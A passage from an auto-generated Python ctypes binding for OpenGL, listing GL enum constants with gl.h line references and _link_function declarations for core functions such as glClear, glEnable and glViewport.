GL_DRAW_PIXEL_TOKEN = 1797 # /usr/include/GL/gl.h:401
GL_COPY_PIXEL_TOKEN = 1798 # /usr/include/GL/gl.h:402
GL_PASS_THROUGH_TOKEN = 1792 # /usr/include/GL/gl.h:403
GL_FEEDBACK_BUFFER_POINTER = 3568 # /usr/include/GL/gl.h:404
GL_FEEDBACK_BUFFER_SIZE = 3569 # /usr/include/GL/gl.h:405
GL_FEEDBACK_BUFFER_TYPE = 3570 # /usr/include/GL/gl.h:406
GL_SELECTION_BUFFER_POINTER = 3571 # /usr/include/GL/gl.h:409
GL_SELECTION_BUFFER_SIZE = 3572 # /usr/include/GL/gl.h:410
GL_FOG = 2912 # /usr/include/GL/gl.h:413
GL_FOG_MODE = 2917 # /usr/include/GL/gl.h:414
GL_FOG_DENSITY = 2914 # /usr/include/GL/gl.h:415
GL_FOG_COLOR = 2918 # /usr/include/GL/gl.h:416
GL_FOG_INDEX = 2913 # /usr/include/GL/gl.h:417
GL_FOG_START = 2915 # /usr/include/GL/gl.h:418
GL_FOG_END = 2916 # /usr/include/GL/gl.h:419
GL_LINEAR = 9729 # /usr/include/GL/gl.h:420
GL_EXP = 2048 # /usr/include/GL/gl.h:421
GL_EXP2 = 2049 # /usr/include/GL/gl.h:422
GL_LOGIC_OP = 3057 # /usr/include/GL/gl.h:425
GL_INDEX_LOGIC_OP = 3057 # /usr/include/GL/gl.h:426
GL_COLOR_LOGIC_OP = 3058 # /usr/include/GL/gl.h:427
GL_LOGIC_OP_MODE = 3056 # /usr/include/GL/gl.h:428
GL_CLEAR = 5376 # /usr/include/GL/gl.h:429
GL_SET = 5391 # /usr/include/GL/gl.h:430
GL_COPY = 5379 # /usr/include/GL/gl.h:431
GL_COPY_INVERTED = 5388 # /usr/include/GL/gl.h:432
GL_NOOP = 5381 # /usr/include/GL/gl.h:433
GL_INVERT = 5386 # /usr/include/GL/gl.h:434
GL_AND = 5377 # /usr/include/GL/gl.h:435
GL_NAND = 5390 # /usr/include/GL/gl.h:436
GL_OR = 5383 # /usr/include/GL/gl.h:437
GL_NOR = 5384 # /usr/include/GL/gl.h:438
GL_XOR = 5382 # /usr/include/GL/gl.h:439
GL_EQUIV = 5385 # /usr/include/GL/gl.h:440
GL_AND_REVERSE = 5378 # /usr/include/GL/gl.h:441
GL_AND_INVERTED = 5380 # /usr/include/GL/gl.h:442
GL_OR_REVERSE = 5387 # /usr/include/GL/gl.h:443
GL_OR_INVERTED = 5389 # /usr/include/GL/gl.h:444
GL_STENCIL_BITS = 3415 # /usr/include/GL/gl.h:447
GL_STENCIL_TEST = 2960 # /usr/include/GL/gl.h:448
GL_STENCIL_CLEAR_VALUE = 2961 # /usr/include/GL/gl.h:449
GL_STENCIL_FUNC = 2962 # /usr/include/GL/gl.h:450
GL_STENCIL_VALUE_MASK = 2963 # /usr/include/GL/gl.h:451
GL_STENCIL_FAIL = 2964 # /usr/include/GL/gl.h:452
GL_STENCIL_PASS_DEPTH_FAIL = 2965 # /usr/include/GL/gl.h:453
GL_STENCIL_PASS_DEPTH_PASS = 2966 # /usr/include/GL/gl.h:454
GL_STENCIL_REF = 2967 # /usr/include/GL/gl.h:455
GL_STENCIL_WRITEMASK = 2968 # /usr/include/GL/gl.h:456
GL_STENCIL_INDEX = 6401 # /usr/include/GL/gl.h:457
GL_KEEP = 7680 # /usr/include/GL/gl.h:458
GL_REPLACE = 7681 # /usr/include/GL/gl.h:459
GL_INCR = 7682 # /usr/include/GL/gl.h:460
GL_DECR = 7683 # /usr/include/GL/gl.h:461
GL_NONE = 0 # /usr/include/GL/gl.h:464
GL_LEFT = 1030 # /usr/include/GL/gl.h:465
GL_RIGHT = 1031 # /usr/include/GL/gl.h:466
GL_FRONT_LEFT = 1024 # /usr/include/GL/gl.h:470
GL_FRONT_RIGHT = 1025 # /usr/include/GL/gl.h:471
GL_BACK_LEFT = 1026 # /usr/include/GL/gl.h:472
GL_BACK_RIGHT = 1027 # /usr/include/GL/gl.h:473
GL_AUX0 = 1033 # /usr/include/GL/gl.h:474
GL_AUX1 = 1034 # /usr/include/GL/gl.h:475
GL_AUX2 = 1035 # /usr/include/GL/gl.h:476
GL_AUX3 = 1036 # /usr/include/GL/gl.h:477
GL_COLOR_INDEX = 6400 # /usr/include/GL/gl.h:478
GL_RED = 6403 # /usr/include/GL/gl.h:479
GL_GREEN = 6404 # /usr/include/GL/gl.h:480
GL_BLUE = 6405 # /usr/include/GL/gl.h:481
GL_ALPHA = 6406 # /usr/include/GL/gl.h:482
GL_LUMINANCE = 6409 # /usr/include/GL/gl.h:483
GL_LUMINANCE_ALPHA = 6410 # /usr/include/GL/gl.h:484
GL_ALPHA_BITS = 3413 # /usr/include/GL/gl.h:485
GL_RED_BITS = 3410 # /usr/include/GL/gl.h:486
GL_GREEN_BITS = 3411 # /usr/include/GL/gl.h:487
GL_BLUE_BITS = 3412 # /usr/include/GL/gl.h:488
GL_INDEX_BITS = 3409 # /usr/include/GL/gl.h:489
GL_SUBPIXEL_BITS = 3408 # /usr/include/GL/gl.h:490
GL_AUX_BUFFERS = 3072 # /usr/include/GL/gl.h:491
GL_READ_BUFFER = 3074 # /usr/include/GL/gl.h:492
GL_DRAW_BUFFER = 3073 # /usr/include/GL/gl.h:493
GL_DOUBLEBUFFER = 3122 # /usr/include/GL/gl.h:494
GL_STEREO = 3123 # /usr/include/GL/gl.h:495
GL_BITMAP = 6656 # /usr/include/GL/gl.h:496
GL_COLOR = 6144 # /usr/include/GL/gl.h:497
GL_DEPTH = 6145 # /usr/include/GL/gl.h:498
GL_STENCIL = 6146 # /usr/include/GL/gl.h:499
GL_DITHER = 3024 # /usr/include/GL/gl.h:500
GL_RGB = 6407 # /usr/include/GL/gl.h:501
GL_RGBA = 6408 # /usr/include/GL/gl.h:502
GL_MAX_LIST_NESTING = 2865 # /usr/include/GL/gl.h:505
GL_MAX_EVAL_ORDER = 3376 # /usr/include/GL/gl.h:506
GL_MAX_LIGHTS = 3377 # /usr/include/GL/gl.h:507
GL_MAX_CLIP_PLANES = 3378 # /usr/include/GL/gl.h:508
GL_MAX_TEXTURE_SIZE = 3379 # /usr/include/GL/gl.h:509
GL_MAX_PIXEL_MAP_TABLE = 3380 # /usr/include/GL/gl.h:510
GL_MAX_ATTRIB_STACK_DEPTH = 3381 # /usr/include/GL/gl.h:511
GL_MAX_MODELVIEW_STACK_DEPTH = 3382 # /usr/include/GL/gl.h:512
GL_MAX_NAME_STACK_DEPTH = 3383 # /usr/include/GL/gl.h:513
GL_MAX_PROJECTION_STACK_DEPTH = 3384 # /usr/include/GL/gl.h:514
GL_MAX_TEXTURE_STACK_DEPTH = 3385 # /usr/include/GL/gl.h:515
GL_MAX_VIEWPORT_DIMS = 3386 # /usr/include/GL/gl.h:516
GL_MAX_CLIENT_ATTRIB_STACK_DEPTH = 3387 # /usr/include/GL/gl.h:517
GL_ATTRIB_STACK_DEPTH = 2992 # /usr/include/GL/gl.h:520
GL_CLIENT_ATTRIB_STACK_DEPTH = 2993 # /usr/include/GL/gl.h:521
GL_COLOR_CLEAR_VALUE = 3106 # /usr/include/GL/gl.h:522
GL_COLOR_WRITEMASK = 3107 # /usr/include/GL/gl.h:523
GL_CURRENT_INDEX = 2817 # /usr/include/GL/gl.h:524
GL_CURRENT_COLOR = 2816 # /usr/include/GL/gl.h:525
GL_CURRENT_NORMAL = 2818 # /usr/include/GL/gl.h:526
GL_CURRENT_RASTER_COLOR = 2820 # /usr/include/GL/gl.h:527
GL_CURRENT_RASTER_DISTANCE = 2825 # /usr/include/GL/gl.h:528
GL_CURRENT_RASTER_INDEX = 2821 # /usr/include/GL/gl.h:529
GL_CURRENT_RASTER_POSITION = 2823 # /usr/include/GL/gl.h:530
GL_CURRENT_RASTER_TEXTURE_COORDS = 2822 # /usr/include/GL/gl.h:531
GL_CURRENT_RASTER_POSITION_VALID = 2824 # /usr/include/GL/gl.h:532
GL_CURRENT_TEXTURE_COORDS = 2819 # /usr/include/GL/gl.h:533
GL_INDEX_CLEAR_VALUE = 3104 # /usr/include/GL/gl.h:534
GL_INDEX_MODE = 3120 # /usr/include/GL/gl.h:535
GL_INDEX_WRITEMASK = 3105 # /usr/include/GL/gl.h:536
GL_MODELVIEW_MATRIX = 2982 # /usr/include/GL/gl.h:537
GL_MODELVIEW_STACK_DEPTH = 2979 # /usr/include/GL/gl.h:538
GL_NAME_STACK_DEPTH = 3440 # /usr/include/GL/gl.h:539
GL_PROJECTION_MATRIX = 2983 # /usr/include/GL/gl.h:540
GL_PROJECTION_STACK_DEPTH = 2980 # /usr/include/GL/gl.h:541
GL_RENDER_MODE = 3136 # /usr/include/GL/gl.h:542
GL_RGBA_MODE = 3121 # /usr/include/GL/gl.h:543
GL_TEXTURE_MATRIX = 2984 # /usr/include/GL/gl.h:544
GL_TEXTURE_STACK_DEPTH = 2981 # /usr/include/GL/gl.h:545
GL_VIEWPORT = 2978 # /usr/include/GL/gl.h:546
GL_AUTO_NORMAL = 3456 # /usr/include/GL/gl.h:549
GL_MAP1_COLOR_4 = 3472 # /usr/include/GL/gl.h:550
GL_MAP1_INDEX = 3473 # /usr/include/GL/gl.h:551
GL_MAP1_NORMAL = 3474 # /usr/include/GL/gl.h:552
GL_MAP1_TEXTURE_COORD_1 = 3475 # /usr/include/GL/gl.h:553
GL_MAP1_TEXTURE_COORD_2 = 3476 # /usr/include/GL/gl.h:554
GL_MAP1_TEXTURE_COORD_3 = 3477 # /usr/include/GL/gl.h:555
GL_MAP1_TEXTURE_COORD_4 = 3478 # /usr/include/GL/gl.h:556
GL_MAP1_VERTEX_3 = 3479 # /usr/include/GL/gl.h:557
GL_MAP1_VERTEX_4 = 3480 # /usr/include/GL/gl.h:558
GL_MAP2_COLOR_4 = 3504 # /usr/include/GL/gl.h:559
GL_MAP2_INDEX = 3505 # /usr/include/GL/gl.h:560
GL_MAP2_NORMAL = 3506 # /usr/include/GL/gl.h:561
GL_MAP2_TEXTURE_COORD_1 = 3507 # /usr/include/GL/gl.h:562
GL_MAP2_TEXTURE_COORD_2 = 3508 # /usr/include/GL/gl.h:563
GL_MAP2_TEXTURE_COORD_3 = 3509 # /usr/include/GL/gl.h:564
GL_MAP2_TEXTURE_COORD_4 = 3510 # /usr/include/GL/gl.h:565
GL_MAP2_VERTEX_3 = 3511 # /usr/include/GL/gl.h:566
GL_MAP2_VERTEX_4 = 3512 # /usr/include/GL/gl.h:567
GL_MAP1_GRID_DOMAIN = 3536 # /usr/include/GL/gl.h:568
GL_MAP1_GRID_SEGMENTS = 3537 # /usr/include/GL/gl.h:569
GL_MAP2_GRID_DOMAIN = 3538 # /usr/include/GL/gl.h:570
GL_MAP2_GRID_SEGMENTS = 3539 # /usr/include/GL/gl.h:571
GL_COEFF = 2560 # /usr/include/GL/gl.h:572
GL_ORDER = 2561 # /usr/include/GL/gl.h:573
GL_DOMAIN = 2562 # /usr/include/GL/gl.h:574
GL_PERSPECTIVE_CORRECTION_HINT = 3152 # /usr/include/GL/gl.h:577
GL_POINT_SMOOTH_HINT = 3153 # /usr/include/GL/gl.h:578
GL_LINE_SMOOTH_HINT = 3154 # /usr/include/GL/gl.h:579
GL_POLYGON_SMOOTH_HINT = 3155 # /usr/include/GL/gl.h:580
GL_FOG_HINT = 3156 # /usr/include/GL/gl.h:581
GL_DONT_CARE = 4352 # /usr/include/GL/gl.h:582
GL_FASTEST = 4353 # /usr/include/GL/gl.h:583
GL_NICEST = 4354 # /usr/include/GL/gl.h:584
GL_SCISSOR_BOX = 3088 # /usr/include/GL/gl.h:587
GL_SCISSOR_TEST = 3089 # /usr/include/GL/gl.h:588
GL_MAP_COLOR = 3344 # /usr/include/GL/gl.h:591
GL_MAP_STENCIL = 3345 # /usr/include/GL/gl.h:592
GL_INDEX_SHIFT = 3346 # /usr/include/GL/gl.h:593
GL_INDEX_OFFSET = 3347 # /usr/include/GL/gl.h:594
GL_RED_SCALE = 3348 # /usr/include/GL/gl.h:595
GL_RED_BIAS = 3349 # /usr/include/GL/gl.h:596
GL_GREEN_SCALE = 3352 # /usr/include/GL/gl.h:597
GL_GREEN_BIAS = 3353 # /usr/include/GL/gl.h:598
GL_BLUE_SCALE = 3354 # /usr/include/GL/gl.h:599
GL_BLUE_BIAS = 3355 # /usr/include/GL/gl.h:600
GL_ALPHA_SCALE = 3356 # /usr/include/GL/gl.h:601
GL_ALPHA_BIAS = 3357 # /usr/include/GL/gl.h:602
GL_DEPTH_SCALE = 3358 # /usr/include/GL/gl.h:603
GL_DEPTH_BIAS = 3359 # /usr/include/GL/gl.h:604
GL_PIXEL_MAP_S_TO_S_SIZE = 3249 # /usr/include/GL/gl.h:605
GL_PIXEL_MAP_I_TO_I_SIZE = 3248 # /usr/include/GL/gl.h:606
GL_PIXEL_MAP_I_TO_R_SIZE = 3250 # /usr/include/GL/gl.h:607
GL_PIXEL_MAP_I_TO_G_SIZE = 3251 # /usr/include/GL/gl.h:608
GL_PIXEL_MAP_I_TO_B_SIZE = 3252 # /usr/include/GL/gl.h:609
GL_PIXEL_MAP_I_TO_A_SIZE = 3253 # /usr/include/GL/gl.h:610
GL_PIXEL_MAP_R_TO_R_SIZE = 3254 # /usr/include/GL/gl.h:611
GL_PIXEL_MAP_G_TO_G_SIZE = 3255 # /usr/include/GL/gl.h:612
GL_PIXEL_MAP_B_TO_B_SIZE = 3256 # /usr/include/GL/gl.h:613
GL_PIXEL_MAP_A_TO_A_SIZE = 3257 # /usr/include/GL/gl.h:614
GL_PIXEL_MAP_S_TO_S = 3185 # /usr/include/GL/gl.h:615
GL_PIXEL_MAP_I_TO_I = 3184 # /usr/include/GL/gl.h:616
GL_PIXEL_MAP_I_TO_R = 3186 # /usr/include/GL/gl.h:617
GL_PIXEL_MAP_I_TO_G = 3187 # /usr/include/GL/gl.h:618
GL_PIXEL_MAP_I_TO_B = 3188 # /usr/include/GL/gl.h:619
GL_PIXEL_MAP_I_TO_A = 3189 # /usr/include/GL/gl.h:620
GL_PIXEL_MAP_R_TO_R = 3190 # /usr/include/GL/gl.h:621
GL_PIXEL_MAP_G_TO_G = 3191 # /usr/include/GL/gl.h:622
GL_PIXEL_MAP_B_TO_B = 3192 # /usr/include/GL/gl.h:623
GL_PIXEL_MAP_A_TO_A = 3193 # /usr/include/GL/gl.h:624
GL_PACK_ALIGNMENT = 3333 # /usr/include/GL/gl.h:625
GL_PACK_LSB_FIRST = 3329 # /usr/include/GL/gl.h:626
GL_PACK_ROW_LENGTH = 3330 # /usr/include/GL/gl.h:627
GL_PACK_SKIP_PIXELS = 3332 # /usr/include/GL/gl.h:628
GL_PACK_SKIP_ROWS = 3331 # /usr/include/GL/gl.h:629
GL_PACK_SWAP_BYTES = 3328 # /usr/include/GL/gl.h:630
GL_UNPACK_ALIGNMENT = 3317 # /usr/include/GL/gl.h:631
GL_UNPACK_LSB_FIRST = 3313 # /usr/include/GL/gl.h:632
GL_UNPACK_ROW_LENGTH = 3314 # /usr/include/GL/gl.h:633
GL_UNPACK_SKIP_PIXELS = 3316 # /usr/include/GL/gl.h:634
GL_UNPACK_SKIP_ROWS = 3315 # /usr/include/GL/gl.h:635
GL_UNPACK_SWAP_BYTES = 3312 # /usr/include/GL/gl.h:636
GL_ZOOM_X = 3350 # /usr/include/GL/gl.h:637
GL_ZOOM_Y = 3351 # /usr/include/GL/gl.h:638
GL_TEXTURE_ENV = 8960 # /usr/include/GL/gl.h:641
GL_TEXTURE_ENV_MODE = 8704 # /usr/include/GL/gl.h:642
GL_TEXTURE_1D = 3552 # /usr/include/GL/gl.h:643
GL_TEXTURE_2D = 3553 # /usr/include/GL/gl.h:644
GL_TEXTURE_WRAP_S = 10242 # /usr/include/GL/gl.h:645
GL_TEXTURE_WRAP_T = 10243 # /usr/include/GL/gl.h:646
GL_TEXTURE_MAG_FILTER = 10240 # /usr/include/GL/gl.h:647
GL_TEXTURE_MIN_FILTER = 10241 # /usr/include/GL/gl.h:648
GL_TEXTURE_ENV_COLOR = 8705 # /usr/include/GL/gl.h:649
GL_TEXTURE_GEN_S = 3168 # /usr/include/GL/gl.h:650
GL_TEXTURE_GEN_T = 3169 # /usr/include/GL/gl.h:651
GL_TEXTURE_GEN_R = 3170 # /usr/include/GL/gl.h:652
GL_TEXTURE_GEN_Q = 3171 # /usr/include/GL/gl.h:653
GL_TEXTURE_GEN_MODE = 9472 # /usr/include/GL/gl.h:654
GL_TEXTURE_BORDER_COLOR = 4100 # /usr/include/GL/gl.h:655
GL_TEXTURE_WIDTH = 4096 # /usr/include/GL/gl.h:656
GL_TEXTURE_HEIGHT = 4097 # /usr/include/GL/gl.h:657
GL_TEXTURE_BORDER = 4101 # /usr/include/GL/gl.h:658
GL_TEXTURE_COMPONENTS = 4099 # /usr/include/GL/gl.h:659
GL_TEXTURE_RED_SIZE = 32860 # /usr/include/GL/gl.h:660
GL_TEXTURE_GREEN_SIZE = 32861 # /usr/include/GL/gl.h:661
GL_TEXTURE_BLUE_SIZE = 32862 # /usr/include/GL/gl.h:662
GL_TEXTURE_ALPHA_SIZE = 32863 # /usr/include/GL/gl.h:663
GL_TEXTURE_LUMINANCE_SIZE = 32864 # /usr/include/GL/gl.h:664
GL_TEXTURE_INTENSITY_SIZE = 32865 # /usr/include/GL/gl.h:665
GL_NEAREST_MIPMAP_NEAREST = 9984 # /usr/include/GL/gl.h:666
GL_NEAREST_MIPMAP_LINEAR = 9986 # /usr/include/GL/gl.h:667
GL_LINEAR_MIPMAP_NEAREST = 9985 # /usr/include/GL/gl.h:668
GL_LINEAR_MIPMAP_LINEAR = 9987 # /usr/include/GL/gl.h:669
GL_OBJECT_LINEAR = 9217 # /usr/include/GL/gl.h:670
GL_OBJECT_PLANE = 9473 # /usr/include/GL/gl.h:671
GL_EYE_LINEAR = 9216 # /usr/include/GL/gl.h:672
GL_EYE_PLANE = 9474 # /usr/include/GL/gl.h:673
GL_SPHERE_MAP = 9218 # /usr/include/GL/gl.h:674
GL_DECAL = 8449 # /usr/include/GL/gl.h:675
GL_MODULATE = 8448 # /usr/include/GL/gl.h:676
GL_NEAREST = 9728 # /usr/include/GL/gl.h:677
GL_REPEAT = 10497 # /usr/include/GL/gl.h:678
GL_CLAMP = 10496 # /usr/include/GL/gl.h:679
GL_S = 8192 # /usr/include/GL/gl.h:680
GL_T = 8193 # /usr/include/GL/gl.h:681
GL_R = 8194 # /usr/include/GL/gl.h:682
GL_Q = 8195 # /usr/include/GL/gl.h:683
GL_VENDOR = 7936 # /usr/include/GL/gl.h:686
GL_RENDERER = 7937 # /usr/include/GL/gl.h:687
GL_VERSION = 7938 # /usr/include/GL/gl.h:688
GL_EXTENSIONS = 7939 # /usr/include/GL/gl.h:689
GL_NO_ERROR = 0 # /usr/include/GL/gl.h:692
GL_INVALID_ENUM = 1280 # /usr/include/GL/gl.h:693
GL_INVALID_VALUE = 1281 # /usr/include/GL/gl.h:694
GL_INVALID_OPERATION = 1282 # /usr/include/GL/gl.h:695
GL_STACK_OVERFLOW = 1283 # /usr/include/GL/gl.h:696
GL_STACK_UNDERFLOW = 1284 # /usr/include/GL/gl.h:697
GL_OUT_OF_MEMORY = 1285 # /usr/include/GL/gl.h:698
GL_CURRENT_BIT = 1 # /usr/include/GL/gl.h:701
GL_POINT_BIT = 2 # /usr/include/GL/gl.h:702
GL_LINE_BIT = 4 # /usr/include/GL/gl.h:703
GL_POLYGON_BIT = 8 # /usr/include/GL/gl.h:704
GL_POLYGON_STIPPLE_BIT = 16 # /usr/include/GL/gl.h:705
GL_PIXEL_MODE_BIT = 32 # /usr/include/GL/gl.h:706
GL_LIGHTING_BIT = 64 # /usr/include/GL/gl.h:707
GL_FOG_BIT = 128 # /usr/include/GL/gl.h:708
GL_DEPTH_BUFFER_BIT = 256 # /usr/include/GL/gl.h:709
GL_ACCUM_BUFFER_BIT = 512 # /usr/include/GL/gl.h:710
GL_STENCIL_BUFFER_BIT = 1024 # /usr/include/GL/gl.h:711
GL_VIEWPORT_BIT = 2048 # /usr/include/GL/gl.h:712
GL_TRANSFORM_BIT = 4096 # /usr/include/GL/gl.h:713
GL_ENABLE_BIT = 8192 # /usr/include/GL/gl.h:714
GL_COLOR_BUFFER_BIT = 16384 # /usr/include/GL/gl.h:715
GL_HINT_BIT = 32768 # /usr/include/GL/gl.h:716
GL_EVAL_BIT = 65536 # /usr/include/GL/gl.h:717
GL_LIST_BIT = 131072 # /usr/include/GL/gl.h:718
GL_TEXTURE_BIT = 262144 # /usr/include/GL/gl.h:719
GL_SCISSOR_BIT = 524288 # /usr/include/GL/gl.h:720
GL_ALL_ATTRIB_BITS = 1048575 # /usr/include/GL/gl.h:721
GL_PROXY_TEXTURE_1D = 32867 # /usr/include/GL/gl.h:725
GL_PROXY_TEXTURE_2D = 32868 # /usr/include/GL/gl.h:726
GL_TEXTURE_PRIORITY = 32870 # /usr/include/GL/gl.h:727
GL_TEXTURE_RESIDENT = 32871 # /usr/include/GL/gl.h:728
GL_TEXTURE_BINDING_1D = 32872 # /usr/include/GL/gl.h:729
GL_TEXTURE_BINDING_2D = 32873 # /usr/include/GL/gl.h:730
GL_TEXTURE_INTERNAL_FORMAT = 4099 # /usr/include/GL/gl.h:731
GL_ALPHA4 = 32827 # /usr/include/GL/gl.h:732
GL_ALPHA8 = 32828 # /usr/include/GL/gl.h:733
GL_ALPHA12 = 32829 # /usr/include/GL/gl.h:734
GL_ALPHA16 = 32830 # /usr/include/GL/gl.h:735
GL_LUMINANCE4 = 32831 # /usr/include/GL/gl.h:736
GL_LUMINANCE8 = 32832 # /usr/include/GL/gl.h:737
GL_LUMINANCE12 = 32833 # /usr/include/GL/gl.h:738
GL_LUMINANCE16 = 32834 # /usr/include/GL/gl.h:739
GL_LUMINANCE4_ALPHA4 = 32835 # /usr/include/GL/gl.h:740
GL_LUMINANCE6_ALPHA2 = 32836 # /usr/include/GL/gl.h:741
GL_LUMINANCE8_ALPHA8 = 32837 # /usr/include/GL/gl.h:742
GL_LUMINANCE12_ALPHA4 = 32838 # /usr/include/GL/gl.h:743
GL_LUMINANCE12_ALPHA12 = 32839 # /usr/include/GL/gl.h:744
GL_LUMINANCE16_ALPHA16 = 32840 # /usr/include/GL/gl.h:745
GL_INTENSITY = 32841 # /usr/include/GL/gl.h:746
GL_INTENSITY4 = 32842 # /usr/include/GL/gl.h:747
GL_INTENSITY8 = 32843 # /usr/include/GL/gl.h:748
GL_INTENSITY12 = 32844 # /usr/include/GL/gl.h:749
GL_INTENSITY16 = 32845 # /usr/include/GL/gl.h:750
GL_R3_G3_B2 = 10768 # /usr/include/GL/gl.h:751
GL_RGB4 = 32847 # /usr/include/GL/gl.h:752
GL_RGB5 = 32848 # /usr/include/GL/gl.h:753
GL_RGB8 = 32849 # /usr/include/GL/gl.h:754
GL_RGB10 = 32850 # /usr/include/GL/gl.h:755
GL_RGB12 = 32851 # /usr/include/GL/gl.h:756
GL_RGB16 = 32852 # /usr/include/GL/gl.h:757
GL_RGBA2 = 32853 # /usr/include/GL/gl.h:758
GL_RGBA4 = 32854 # /usr/include/GL/gl.h:759
GL_RGB5_A1 = 32855 # /usr/include/GL/gl.h:760
GL_RGBA8 = 32856 # /usr/include/GL/gl.h:761
GL_RGB10_A2 = 32857 # /usr/include/GL/gl.h:762
GL_RGBA12 = 32858 # /usr/include/GL/gl.h:763
GL_RGBA16 = 32859 # /usr/include/GL/gl.h:764
GL_CLIENT_PIXEL_STORE_BIT = 1 # /usr/include/GL/gl.h:765
GL_CLIENT_VERTEX_ARRAY_BIT = 2 # /usr/include/GL/gl.h:766
GL_ALL_CLIENT_ATTRIB_BITS = 4294967295 # /usr/include/GL/gl.h:767
GL_CLIENT_ALL_ATTRIB_BITS = 4294967295 # /usr/include/GL/gl.h:768
# /usr/include/GL/gl.h:776
glClearIndex = _link_function('glClearIndex', None, [GLfloat], None)
# /usr/include/GL/gl.h:778
glClearColor = _link_function('glClearColor', None, [GLclampf, GLclampf, GLclampf, GLclampf], None)
# /usr/include/GL/gl.h:780
glClear = _link_function('glClear', None, [GLbitfield], None)
# /usr/include/GL/gl.h:782
glIndexMask = _link_function('glIndexMask', None, [GLuint], None)
# /usr/include/GL/gl.h:784
glColorMask = _link_function('glColorMask', None, [GLboolean, GLboolean, GLboolean, GLboolean], None)
# /usr/include/GL/gl.h:786
glAlphaFunc = _link_function('glAlphaFunc', None, [GLenum, GLclampf], None)
# /usr/include/GL/gl.h:788
glBlendFunc = _link_function('glBlendFunc', None, [GLenum, GLenum], None)
# /usr/include/GL/gl.h:790
glLogicOp = _link_function('glLogicOp', None, [GLenum], None)
# /usr/include/GL/gl.h:792
glCullFace = _link_function('glCullFace', None, [GLenum], None)
# /usr/include/GL/gl.h:794
glFrontFace = _link_function('glFrontFace', None, [GLenum], None)
# /usr/include/GL/gl.h:796
glPointSize = _link_function('glPointSize', None, [GLfloat], None)
# /usr/include/GL/gl.h:798
glLineWidth = _link_function('glLineWidth', None, [GLfloat], None)
# /usr/include/GL/gl.h:800
glLineStipple = _link_function('glLineStipple', None, [GLint, GLushort], None)
# /usr/include/GL/gl.h:802
glPolygonMode = _link_function('glPolygonMode', None, [GLenum, GLenum], None)
# /usr/include/GL/gl.h:804
glPolygonOffset = _link_function('glPolygonOffset', None, [GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:806
glPolygonStipple = _link_function('glPolygonStipple', None, [POINTER(GLubyte)], None)
# /usr/include/GL/gl.h:808
glGetPolygonStipple = _link_function('glGetPolygonStipple', None, [POINTER(GLubyte)], None)
# /usr/include/GL/gl.h:810
glEdgeFlag = _link_function('glEdgeFlag', None, [GLboolean], None)
# /usr/include/GL/gl.h:812
glEdgeFlagv = _link_function('glEdgeFlagv', None, [POINTER(GLboolean)], None)
# /usr/include/GL/gl.h:814
glScissor = _link_function('glScissor', None, [GLint, GLint, GLsizei, GLsizei], None)
# /usr/include/GL/gl.h:816
glClipPlane = _link_function('glClipPlane', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:818
glGetClipPlane = _link_function('glGetClipPlane', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:820
glDrawBuffer = _link_function('glDrawBuffer', None, [GLenum], None)
# /usr/include/GL/gl.h:822
glReadBuffer = _link_function('glReadBuffer', None, [GLenum], None)
# /usr/include/GL/gl.h:824
glEnable = _link_function('glEnable', None, [GLenum], None)
# /usr/include/GL/gl.h:826
glDisable = _link_function('glDisable', None, [GLenum], None)
# /usr/include/GL/gl.h:828
glIsEnabled = _link_function('glIsEnabled', GLboolean, [GLenum], None)
# /usr/include/GL/gl.h:831
glEnableClientState = _link_function('glEnableClientState', None, [GLenum], None)
# /usr/include/GL/gl.h:833
glDisableClientState = _link_function('glDisableClientState', None, [GLenum], None)
# /usr/include/GL/gl.h:836
glGetBooleanv = _link_function('glGetBooleanv', None, [GLenum, POINTER(GLboolean)], None)
# /usr/include/GL/gl.h:838
glGetDoublev = _link_function('glGetDoublev', None, [GLenum, POINTER(GLdouble)], None)
# /usr/include/GL/gl.h:840
glGetFloatv = _link_function('glGetFloatv', None, [GLenum, POINTER(GLfloat)], None)
# /usr/include/GL/gl.h:842
glGetIntegerv = _link_function('glGetIntegerv', None, [GLenum, POINTER(GLint)], None)
# /usr/include/GL/gl.h:845
glPushAttrib = _link_function('glPushAttrib', None, [GLbitfield], None)
# /usr/include/GL/gl.h:847
glPopAttrib = _link_function('glPopAttrib', None, [], None)
# /usr/include/GL/gl.h:850
glPushClientAttrib = _link_function('glPushClientAttrib', None, [GLbitfield], None)
# /usr/include/GL/gl.h:852
glPopClientAttrib = _link_function('glPopClientAttrib', None, [], None)
# /usr/include/GL/gl.h:855
glRenderMode = _link_function('glRenderMode', GLint, [GLenum], None)
# /usr/include/GL/gl.h:857
glGetError = _link_function('glGetError', GLenum, [], None)
# /usr/include/GL/gl.h:859
glGetString = _link_function('glGetString', POINTER(GLubyte), [GLenum], None)
# /usr/include/GL/gl.h:861
glFinish = _link_function('glFinish', None, [], None)
# /usr/include/GL/gl.h:863
glFlush = _link_function('glFlush', None, [], None)
# /usr/include/GL/gl.h:865
glHint = _link_function('glHint', None, [GLenum, GLenum], None)
# /usr/include/GL/gl.h:872
glClearDepth = _link_function('glClearDepth', None, [GLclampd], None)
# /usr/include/GL/gl.h:874
glDepthFunc = _link_function('glDepthFunc', None, [GLenum], None)
# /usr/include/GL/gl.h:876
glDepthMask = _link_function('glDepthMask', None, [GLboolean], None)
# /usr/include/GL/gl.h:878
glDepthRange = _link_function('glDepthRange', None, [GLclampd, GLclampd], None)
# /usr/include/GL/gl.h:885
glClearAccum = _link_function('glClearAccum', None, [GLfloat, GLfloat, GLfloat, GLfloat], None)
# /usr/include/GL/gl.h:887
glAccum = _link_function('glAccum', None, [GLenum, GLfloat], None)
# /usr/include/GL/gl.h:894
glMatrixMode = _link_function('glMatrixMode', None, [GLenum], None)
# /usr/include/GL/gl.h:896
glOrtho = _link_function('glOrtho', None, [GLdouble, GLdouble, GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:900
glFrustum = _link_function('glFrustum', None, [GLdouble, GLdouble, GLdouble, GLdouble, GLdouble, GLdouble], None)
# /usr/include/GL/gl.h:904
glViewport = _link_function('glViewport', None, [GLint, GLint, GLsizei, GLsizei], None)
# /usr/include/GL/gl.h:907
glPushMatrix = _link_function('glPushMatrix', None, [], None)
# /usr/include/GL/gl.h:909
glPopMatrix = _link_function('glPopMatrix', None, [], None)
# /usr/include/GL/gl.h:911
glLoadIdentity = _link_function('glLoadIdentity', None, [], None)
# /usr/include/GL/gl.h:913
glLoadMatrixd = _link_function('glLoadMatrixd', None, [POINTER(GLdouble)], None)
